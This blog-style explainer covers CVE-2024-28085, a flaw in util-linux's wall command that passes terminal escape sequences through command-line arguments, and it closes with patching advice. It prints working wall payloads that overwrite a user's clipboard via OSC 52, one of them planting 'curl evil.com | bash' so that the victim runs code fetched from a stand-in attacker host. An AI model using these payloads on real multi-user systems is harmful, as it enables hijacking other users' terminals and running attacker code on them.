If you’ve ever used a Linux or Unix server, you probably know wall – the “write all” command used to broadcast messages to every logged-in user. It’s handy for system admins to send warnings like “System is going down for maintenance!” However, in 2024, researchers discovered a flaw that makes this classic admin tool far more dangerous than it seems.
In this post, I’ll break down CVE-2024-28085. We’ll look at what makes the bug in util-linux’s wall command tick, see example exploit code, and discuss how it might lead to scary real-world problems like account takeovers.
> ### TL;DR: Old tools can have old problems. Here, wall can be tricked into sending malicious terminal codes to other users. If your system has a setgid wall, you're at risk.
What Is Wall?
The wall command broadcasts a message to all terminal users on a system. When invoked, it takes your input (from stdin or as command-line arguments) and prints it to other users’ terminals, showing [username] as the sender.
For compatibility with terminal multiplexers and security, wall is usually installed setgid tty, so it can write to other users’ terminals.
Wall blocks dangerous escape sequences from standard input (stdin).
- But if you pass a message as a command-line argument (in argv), these protections don’t apply.
- A malicious user can exploit this to inject dangerous ANSI control codes (escape sequences) into others’ terminals.
Exploit Details With Code
Suppose user alice and user bob are on the same server. Alice wants to mess with Bob using CVE-2024-28085.
Let’s say Alice wants to silently run a command on Bob’s terminal (e.g., trick Bob into running curl evil.com | bash). This usually needs social engineering, but some terminals react to certain escape sequences!
Step 1: The Evil Payload
The classic trick: use the OSC 52 escape sequence to copy data to a user’s clipboard. But with modern emulators, the right escape can do even more.
Example
# This puts 'hacked' in the user's clipboard if their terminal supports OSC 52
'\033]52;c;SGFja2VkCg==\a'
Here, \033]52;c;<base64data>\a is the escape code for “set clipboard contents”.
Now, let’s send this using wall
# Arguments, not stdin!
/usr/bin/wall $'\033]52;c;SGFja2VkCg==\a'
*(Note the use of $'...' bash syntax to include escape codes in argv)*
If Bob is running a terminal that supports OSC 52, now his clipboard is silently overwritten with "Hacked".
Another escape might be
/usr/bin/wall $'\033];You are pwned\a'
This changes the user's terminal window title to "You are pwned".
Step 3: Plausible Account Takeovers
For true account takeover, attackers need to chain this bug with a terminal or SSH client that automatically executes pasted text, or perhaps a user copying and pasting from their terminal without realizing the clipboard was compromised. Not all emulators are vulnerable, but attack scenarios exist:
- The attacker sends: /usr/bin/wall $'\033]52;c;Y3VybCBldmlsLmNvbSB8IGJhc2gK\a'
The target pastes from their clipboard, unknowingly running curl evil.com | bash
You can even abuse terminal vulnerabilities (read more).
Blocked input
echo -e "\033]52;c;SGFja2VkCg==\a" | wall
# This is blocked by wall's filters.
Unblocked argv
wall $'\033]52;c;SGFja2VkCg==\a'
# This is NOT blocked.
Original report:
Qualys Security Advisory for CVE-2024-28085 (Wallescape)
Upstream patch:
Red Hat Security Bulletin:
Osc52 resource:
Conclusion
On multi-user systems, small utilities can hide big hazards. CVE-2024-28085 proves that “trusted” programs with extra privileges – like wall – need regular security review. It’s easy for an attacker with shell access to exploit escape sequence injections if wall isn’t fixed.
If you manage Linux servers:
Check your util-linux version, update now, and review who can use wall. Even on older systems, an attacker doesn’t need root – only local shell access.
*Stay safe, patch early, and never trust your terminal too much.*
Want more demo code or live exploit tests?
Check the excellent Qualys Wallescape PoCs and util-linux’s own fix commit for full details.
Timeline
Published on: 03/27/2024 19:15:48 UTC
Last modified on: 08/26/2024 21:35:09 UTC